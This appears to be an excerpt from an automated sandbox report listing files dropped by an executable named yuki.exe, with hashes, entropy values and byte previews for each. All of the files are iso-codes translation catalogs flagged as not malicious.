                                                                                                    SHA-256:DF0F715FEA9D70EBF0404D7320BA1FFDD09D0A4A8B4F8D97D3EF61D3382BD0EC
                                                                                                    SHA-512:D54EC4FFFCA8AF37F750424E32B6A3BB4F07DD0EDDDA39D895480141D215B9D9BF854410FB23A5E5220AC519B4A9B69876213208A9BBF8B971C5C9FD7834B913
                                                                                                    Malicious:false
                                                                                                    Preview:................D.......l...........................................I....................................................................Euro.Gold.Guarani.Swiss Franc.Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2008-11-10 01:11+0100.Last-Translator: Yannig Marchegay <yannig@marchegay.org>.Language-Team: Occitan.Language: .MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Euro.Aur.Guaran..Franc so.s.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 79 messages, Project-Id-Version: iso_639-3 'Abcaze'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3446
                                                                                                    Entropy (8bit):4.647954193882982
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:54MchPv30I8E2XX4iMA812qeyHPGPdj0D:5dqpgXIDZ6yHPGPS
                                                                                                    MD5:64179BB447E6D690DC85BE54C17FE125
                                                                                                    SHA1:E3E3EC6E78BF189B3A8BEE73DB720F2AED09312E
                                                                                                    SHA-256:5C2CEDBE2C56C6F65DB2FEDEC4E26A9FF6F3BD99AA72610119E4A4C0ACE554B0
                                                                                                    SHA-512:FE8464D373711A9C274FA4F081FE5247F3A9DF254A4C513E801041DBE4541B57BBED2900FB2265AF669048822157FDF9DB9E11236025CACFDA10F6E466BAF721
                                                                                                    Malicious:false
                                                                                                    Preview:........O...........k...........................................................................................................................(.......0.......8.......A.......H.......P.......Z.......c.......k.......s.......z.......................................................................................................................................&......./.......6.......>.......D.......L.......W.......a.......f.......n.......x.......~............................................................................................................................................... .......'.......1.......>.......C.......N.......T.......Z.......a...n...f.......................................................................................%.......-.......4.......;.......D.......L.......R.......Y.......a.......k.......t.......|...............................................................................................................................!.......+.......3.......<.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7 messages, Project-Id-Version: iso_639-5 'lengas australianas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):856
                                                                                                    Entropy (8bit):5.2094202490694705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:m8AA7/I+sXQdXTt0Us5m9A/F9XmGDQ1Rrn:hEXQRCU/qCCYRrn
                                                                                                    MD5:48396F01163E08E7950361FB89462035
                                                                                                    SHA1:C16B27BFB3438657C3E08B73048B8187D835F3A3
                                                                                                    SHA-256:B73F6D2063F8ED61412647776C10964D5E1174E53553415981B10D4FBA86884E
                                                                                                    SHA-512:ECE83E14A66577B67432A9FBBC1F0A52AE85A14517027760F1CF44F51228214D2ED96D2E1D9EEB4F58853885554D477662164ACCB17AE547B0B8A0B52A77640A
                                                                                                    Malicious:false
                                                                                                    Preview:................T.......................................................................$...............................%.......6.......I................................................Australian languages.Basque (family).Celtic languages.Italic languages.Japanese (family).Nahuatl languages.Project-Id-Version: iso_639-5.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-04-27 18:11+0000.Last-Translator: Quentin PAG.S <quentinantonin@free.fr>.Language-Team: Occitan <https://hosted.weblate.org/projects/iso-codes/iso-639-5/oc/>.Language: oc.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.0.2..lengas australianas.basc (familha).lengas celticas.lengas italianas.japon.s (familha).Lengas nahuatl.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\340\254\206\340\254\253\340\254\227\340\254\276\340\254\250\340\254\277\340\254\270\340\255\215\340\254\244\340\254\276\340\254\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34110
                                                                                                    Entropy (8bit):4.996375948439053
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/DCzHCG/Ubjh5wsWP4XdAIzirGwPxB3lloPue1n6UnjN1fn9:jhZOziGItmsWP4XdAI8BYuM6Ub9
                                                                                                    MD5:56A3A098FFB529B194522A8B9032C4C6
                                                                                                    SHA1:CB1367516DA0AA7C434582D556B8CD49045467F4
                                                                                                    SHA-256:97F21E0762094C2BC12A98F1A60CEC3AFC7EA7BA6C99A46D5BC7FFA1578A2806
                                                                                                    SHA-512:548A91A4FA496E3787F001D2D040A651227CA9756FA82D0104496EC4AF034D5BA2B593FA498AD8B7F4BF3C013A3927220A32403AEA54161755553F29384C488F
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\254\254\340\255\215\340\254\260\340\254\277\340\254\237\340\254\277\340\254\270 \340\254\206\340\254\243\340\255\215\340\254\237\340\254\276\340\254\260\340\255\215\340\254\225\340\254\237\340\254\277\340\254\225\340\254\276 \340\254\266\340\254\276\340\254\270\340\254\277\340\254\244 \340\254\205\340\254\236\340\255\215\340\254\232\340\254\263'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3975
                                                                                                    Entropy (8bit):5.181253203564385
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDemyBo3rC9PReRbGReRNzGReRq5GFRZRvoXn6mvR6R5RiR7RZRMRP:qDp74UIU2UEgFz98hw/gJziJ
                                                                                                    MD5:6C51EDCA515B3EE0C7B91AA66361D85F
                                                                                                    SHA1:EE80BF5EC63DFE66AB4C775D0F27445FC855CD46
                                                                                                    SHA-256:0F327173A6E281FC582E5A647541AB704CDBD5BF25C766559E5FD2AFD21319DA
                                                                                                    SHA-512:F8C401F98C73C6A4DF5977EC0E621C4FEA24F30A5EBD52E90573A07C6D892FFFD5F962AC28D21BAD7C9AE432009ECFA2C3AE571B5A61400FD6F0592964835AA1
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................Z...h...^.......|..."...Z.......................2.......".......).......3...........P...V.......H...+...1...t...........=.......(...........-...r...M...8.......A...........;...(...K...J...t...`.......3... ...H...T...................)...]........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3472 messages, Project-Id-Version: iso_639-3 '\340\254\206\340\254\260\340\255\207 \340\254\206\340\254\260\340\255\207'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):217560
                                                                                                    Entropy (8bit):5.207463248376477
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Il9Srk52U2xhT4mXxYhRu7FvK698cE6MU7+uUG+:QSjB8uhvh9/E6MU7+uUN
                                                                                                    MD5:C64E277D657717910C30AF3F1103013D
                                                                                                    SHA1:0EF9B49E8E63E16651197BEBFE47344F04212E77
                                                                                                    SHA-256:C9916C77A48226501C314465D3A4A8C5B00657F8D0D9B41BA5AB6350BDE743B3
                                                                                                    SHA-512:977B260F7BD27829A6D9F77CAA21D349668D866F34F9C4601FBEBA810C9B766627906089D57CF4B419ED8417AC8674A3EDCD5636D85012F24455075D145268F2
                                                                                                    Malicious:false
                                                                                                    Preview:.................l...............!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......,"......1"......6"......<"......@"......M"......R"......W"......]"......b"......j"......q"......y"......~".......".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#.......#......&#......,#......3#......:#......?#......F#......J#......P#......U#......j#......q#......z#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......*$......:$......J$......_$......s$......~$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%.......%......&%......5%......F%......R%......X%......^%......u%......x%......|%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\340\250\205\340\250\253\340\250\227\340\250\276\340\250\250\340\250\277\340\250\270\340\250\244\340\250\276\340\250\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30877
                                                                                                    Entropy (8bit):5.04853768881185
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosmLal1lINWV46nbjz5wsWP48WAINiZGZ98TwSOXVmTyQ:0oCl1lINS48fmsWP48WAI/17XVmH
                                                                                                    MD5:70288770A22F7964C0612F04A4768359
                                                                                                    SHA1:9B7C2558ACF49717D0E8188D40E81F3C22611573
                                                                                                    SHA-256:F44AC265DC8D9596007803D132F4FEDA093BCB16DA1779FEF69E2493189B8B88
                                                                                                    SHA-512:8595D6662B42C432AE02FDF82ADBADEA0426115A51392938024B409BC3A67D400BFDEDB5A14817D1EBBAB6E75BBAAE35770747EC12DF9A80BDD42FBCCC1845C1
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\340\250\254\340\250\260\340\250\244\340\250\276\340\250\250\340\251\200\340\250\206 \340\250\220\340\250\250\340\250\237\340\250\276\340\250\260\340\250\237\340\250\277\340\250\225 \340\250\226\340\251\207\340\250\244\340\250\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3558
                                                                                                    Entropy (8bit):5.325196839438733
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:rLvaI+yaCoZ012EAy4cJQi9N8DeGNMN5b/1dv:XaIeFZOTogNB
                                                                                                    MD5:3B610AEE71231A7ED45901FE797C2BD1
                                                                                                    SHA1:9C6FB17A0AEF8D9EA4B02036C4C1B1A64AD5C1F0
                                                                                                    SHA-256:4E4FA543A741A4A0BC5178C57D3B3BAB94D38AAD9493B2059C4FEA80194F229B
                                                                                                    SHA-512:22833144CA07ED23D002062D4E58FB3EA029D1EE99583BCECF478F273D6EF1379227AF08A0B5AE4114139FA929F49A131A3EE6C4D4C9B8406841D19FECC32EA1
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................;.......?.......Q...C...B.......v...........O.../...b.........../.......6.......L.......5...f...9......."...............1...........H.......h...A.......,.......;...........3...(...C...5...l...+.......-.......&...........#...3...:...W...n................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7230 messages, Project-Id-Version: iso_639-3 '\340\250\205\340\250\260\340\251\207\340\250\205\340\250\260\340\251\207'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):410401
                                                                                                    Entropy (8bit):5.203330020965122
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:oJpFgLLk8RgsOqjBZpQNmn9E8d1xIQ9HLEry3hqzxfEv:oGLS1UwmPxxregUzxsv
                                                                                                    MD5:3278886A02A552A6A88D3F011BFCB7AF
                                                                                                    SHA1:401E20D07F9C5FC4ABD530403080274CC48B9D15
                                                                                                    SHA-256:4F9E282949333A7BD2D3A7DF213CB8203359E8DD1B893C9440C7703AB54139F0
                                                                                                    SHA-512:2CD7B1779B0B3718C5787F928483B091397DEE3C13EB83C03385D08CFC66A1800D3743CC98F6849F6F7CF62A8FC9AB52A9E24873A3704569E73048C230595139
                                                                                                    Malicious:false
                                                                                                    Preview:........>............%...........Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......[.......[.......[.......[......"[......,[......<[......L[......Q[......V[......\[......`[......e[......j[......o[......u[......}[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......\.......\.......\......%\......,\......2\......9\......=\......G\......U\......]\......c\......j\......q\......v\......}\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......].......].......]......!]......9]......O]......]]......m]......z].......].......].......].......].......].......].......].......].......].......].......].......^.......^.......^.......^.......^......&^......-^......5^......<^......B^......I^......O^......V^......c^......p^......v^......~^.......^.......^.......^.......^.......^.......^.......^......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 18 messages, Project-Id-Version: iso_15924 '\330\247\331\201\330\247\332\251\330\247'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1418
                                                                                                    Entropy (8bit):5.485459756918596
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tOPm8grJZG4r0dOA3F27CVt0UK/R7/oXmGufPWo4IYNZOsM0:YgrWU97lU87B3xfYxM0
                                                                                                    MD5:35B123860AA29B8E037769223ECB619C
                                                                                                    SHA1:FBA5C0E00666340EC6248C758F249E863E9A6366
                                                                                                    SHA-256:2C9F968D7482C5D47B75E1E234B37FF34B358B313CFBB363B60ABB26F65088D9
                                                                                                    SHA-512:A746C60A93D6654AB5FAC8873338076F193D7D967209EBE327DEC73C266F914B3ECEBB93D9D9FD9726E69F78D35C8E5358E3F4B00346C66AB7834ED969A37A07
                                                                                                    Malicious:false
                                                                                                    Preview:........................<.......................................................................................................=.......A.......G.......O.......[...%...g...............p.......{...(...............................................................$...................5.......B.......O.......e.......w........................................................................................................................Afaka.Arabic.Arabic (Nastaliq variant).Bengali.Braille.Cherokee.Devanagari (Nagari).Greek.Gujarati.Gurmukhi.Korean (alias for Hangul + Han).Lao.Latin.Multani.Old Persian.SignWriting.Unified Canadian Aboriginal Syllabics.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2022-10-24 07:37+0000.Last-Translator: bgo-eiu <huyaqoob+toolforge@gmail.com>.Language-Team: Punjabi (Pakistan) <https://hosted.weblate.org/projects/iso-codes/iso-15924/pa_PK/>.Language: pa_PK.MIME-Version: 1.0.Content-T
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 11 messages, Project-Id-Version: iso_3166-2 '\331\276\331\206\330\254\330\247\330\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1018
                                                                                                    Entropy (8bit):5.50517354779157
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:X/seOj9+exADl2PLKTP69Q2PSt0UK/R7/+XmGuad/+V5uws5:h0+exQiMPO5P/U87TKd/+V5zs5
                                                                                                    MD5:60A278807BB880B6751EDFD9FA9E284B
                                                                                                    SHA1:BE18A5E65983458E5483CD0EB24486C0B7717D6E
                                                                                                    SHA-256:AA55BBA3244FC9A0A0B640110A6C39A98B4BE3B50B97227686E6D2B4DD2BDDC9
                                                                                                    SHA-512:85132D7170E2AACE4140E0C02D59D9BCCA18DD75C7D4509F2C53F241AF4322BA1B5A808383F704A7B6B5F58F4F0A439A02D6066337E86FE16F41E1B18F20F6BB
                                                                                                    Malicious:false
                                                                                                    Preview:................t...............................................#.......+.......@.......I.......T.......b.......l.......t.......Y.......d.......m.......v... ....................................................................................................................Punjab.Sindh.Utah.Vermont.Virgin Islands, U.S..Virginia.Washington.West Virginia.Wisconsin.Wyoming.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2022-10-24 07:37+0000.Last-Translator: bgo-eiu <huyaqoob+toolforge@gmail.com>.Language-Team: Punjabi (Pakistan) <https://hosted.weblate.org/projects/iso-codes/iso-3166-2/pa_PK/>.Language: pa_PK.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.14.2-dev............................. ..... ............................ ..............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\331\205\331\220\332\210\331\210\333\222 \331\271\330\247\331\276\331\210'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):601
                                                                                                    Entropy (8bit):5.468993704980499
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iqi1f4xjt02Ukw3t//IGJ5LLPN1/4N6XmBQWiOWuQa:sO5t0UGt3R7/XXmGu3
                                                                                                    MD5:8BEABF7FA7126D1721493880BE98BD05
                                                                                                    SHA1:22EA3E5A04EA4ABE5FC6D6E5444618C1154D2754
                                                                                                    SHA-256:A2E2FD48EFC744EACDCF4FA78B7BD7388FCA71888381EFD5DE4F17EEA1000260
                                                                                                    SHA-512:678FCEC027B9FD32FE8C8E85AA4859D58FBEC694A907B8ADE00B69113D4F53D09F4182C6E9C0484F5D0CC407FC3B202B91F691BE034CCD5C2C3664BC778C1739
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q.......`.......E........................Midway Islands.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2022-10-23 07:05+0000.Last-Translator: bgo-eiu <huyaqoob+toolforge@gmail.com>.Language-Team: Punjabi (Pakistan) <https://hosted.weblate.org/projects/iso-codes/iso-3166-3/pa_PK/>.Language: pa_PK.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.14.2-dev....... .....
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):531
                                                                                                    Entropy (8bit):5.2701660846843295
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4U86xxLtt02UkR/xtLLno/4FdGXmBQWiOWRl:RKjt0Uh/o/NXmGRl
                                                                                                    MD5:2CE7A70FEFF7F88EA2E4B17ECFCBA9DB
                                                                                                    SHA1:B6AC20A9A8DE7129E3962E6DFCCCDA473996A5F9
                                                                                                    SHA-256:1416F4F597E0A5F8D84EF5F038A5D0CFBFC5CEFFBC65105CF57B4E84221620DF
                                                                                                    SHA-512:BC66192CE8BE31A15AA4785DADF6A909B8EE9ADB572A1C0E74676C753BBBA77943195FE741FE36AE2FCC975F9DC61FD8951540D26BFA90E3B297F217185F558C
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-29 08:01+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Papiamento <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/pap/>.Language: pap.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 161 messages, Project-Id-Version: iso_3166-1 '\340\244\205\340\244\253\340\244\227\340\244\276\340\244\250\340\244\270\340\245\215\340\244\245\340\244\276\340\244\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9264
                                                                                                    Entropy (8bit):4.87938890776143
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:gbUtmNfHm0SuUxZVg09TXRK7mrmnI/wbMU4HH:8Utr0Sj3g067T4n
                                                                                                    MD5:09B9241F2B5FF845553FB73D8DB2E80E
                                                                                                    SHA1:6339092165D80DFB5D948173AC4DEE4FAC0A64A4
                                                                                                    SHA-256:A459418B35E7D6A70511FB512C70B53AF3B960463CA5784F60A0351BAE7C2EA9
                                                                                                    SHA-512:99B64ADC58532FDB8F214DFBE69758DC058D636373E5642762C8F1B72C4D8865BA21B2EEC470F8390E94940559A5FE087F6A19C66E200CAED53DA169CF31F19E
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,...............................................................................................................................'......./.......6.......<.......C.......K.......b.......k.......r.......{...............................................................................................................................................&.......9.......A.......G.......S.......[.......d.......i.......q.......x.......~...............................................................................................................................................................................*.......0.......9.......@.......K.......R.......Z.......b.......j.......p.......~...............................................................................................................................................................%.......1.......=.......G.......M.......U.......\.......a.......j.......q...............................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10158
                                                                                                    Entropy (8bit):5.067550693050653
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dml8mWcxQsAQ/OltU4WjV9qWxa5hW8yfTsCCAmDFe/pJi:E8mWcxQ7zg4WjVDxa5hW8yfTsCCkh8
                                                                                                    MD5:35CF3CD8A2F3C4D48DD3596390E75267
                                                                                                    SHA1:D69295D9AEEA68742F4592BB4954025140F8CF4E
                                                                                                    SHA-256:0A16435123F21214DC9FF0A64C991437E39549C741B155E7047F8692C52B6953
                                                                                                    SHA-512:4044AFE85806997D4573886E649B7E0EC5F6F74C63878114F3979858506CB3CD2E31FA33DA8EE73C2DB0D6D8EC18D2B90F68F026262258F712C1001CA5465930
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23849
                                                                                                    Entropy (8bit):5.100421621186459
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosu5amzQUbWb046nbjz5wsWP48WAINiZGPX1pjMPmfriSAohMku:0o0mUUbWb048fmsWP48WAIhX1pjLjzAr
                                                                                                    MD5:994BC111FE52BEABB73C295A5D27E22F
                                                                                                    SHA1:1EB6EBB5FA33EBD831E53BBB6CE3703B064A1D58
                                                                                                    SHA-256:870CE4D74D4DFC8554BF0B9F6A68C370D7B57C9DF94AF3A7AC1E087F0CBBD32F
                                                                                                    SHA-512:FE7445A22C799B4A8D5242B52DF74B3781E715832EF25C11536ED4B80B28F89D86B2B75BA6207EABA9A8096BE593B941515CAD0F460F2D8C5D4DE9F92061B123
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 4615 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):203350
                                                                                                    Entropy (8bit):5.343325325812432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:di9xITNlnza6nH1WDj/8doRTWkTNLE94aWp4p91e/TNM/q1kZlPpqXmbxcO:di9xAZXnHMj/MoRTWyGp9o/dirPpsYxd
                                                                                                    MD5:40D215586259B83965AC8B57928A85FD
                                                                                                    SHA1:0430148F5888D1ACE97A7A6D2C5B18C111F0B7DA
                                                                                                    SHA-256:74378BF7284FECC26753098703FA995978CC727C55B68F5DDC521EE34B52F2DF
                                                                                                    SHA-512:30ABCBD53D89FCBF029FC8B2D1D9E86F0C2A0ED78C105E3F31F2A1ADE7053BB8F906AF8BA817A63F6B33CF1E401770182CB7017EEFB501919731A8B0F76FED86
                                                                                                    Malicious:false
                                                                                                    Preview:................T........ ..................................................................&.......4.......B.......G.......O.......T.......].......b.......j..................................................................................................................................*.......4.......A.......F.......U.......\.......q.............................................................................................................................................+...$.......P.......U.......h.......o.......|............................................................................................................'.......<.......H.......T.......`.......n.......~.............................................................................................'.......3.......B.......J.......T.......^.......g...................................................................................................................%.......1.......;.......E.......P.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Brytyjskie Terytorium Antarktyczne'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3054
                                                                                                    Entropy (8bit):5.361316406819967
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3MCqPLsGP+vGqIfdvqN5CoU9JI0XtCIb5foGdmGswo1pRV+4G8Op3YY8:rLvMCmsu+yaCoAm0X4QbVozAPo1
                                                                                                    MD5:4C6B243EE32B00D2BAD944235F83D553
                                                                                                    SHA1:5059E40E8DBFE95766D73CDE2E5F57F0568848ED
                                                                                                    SHA-256:0EB6A9B05F2980D118C928238D462BE1BE7F55A482E2B490692A36717705DC51
                                                                                                    SHA-512:44D2B8F712EC5043C2BBC74C6C27E70F32D1294F8D528C14190DD5371D68D0DECBF779FD1977E3760E529C7E508DA281A182CFC1C2C14AB94BB76996B73BB05B
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............H......."...6...6...Y...4...............9...........................0.......?...&...V.../...}...!...........................................................).......D......._.......t.......{...'.......4.......%.......4...........G...M...L...=....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'jednostka rozrachunkowa ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9807
                                                                                                    Entropy (8bit):5.007901355243804
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqF9N/6mgtEpq7MHfnS6VRyK0G/2LCntxnua06yzIsAxI0Q9c:SIKpX/S6TL0G/Uo/nua0/zIsEjQ+
                                                                                                    MD5:A93058E074503E805180D0FFCD6D980E
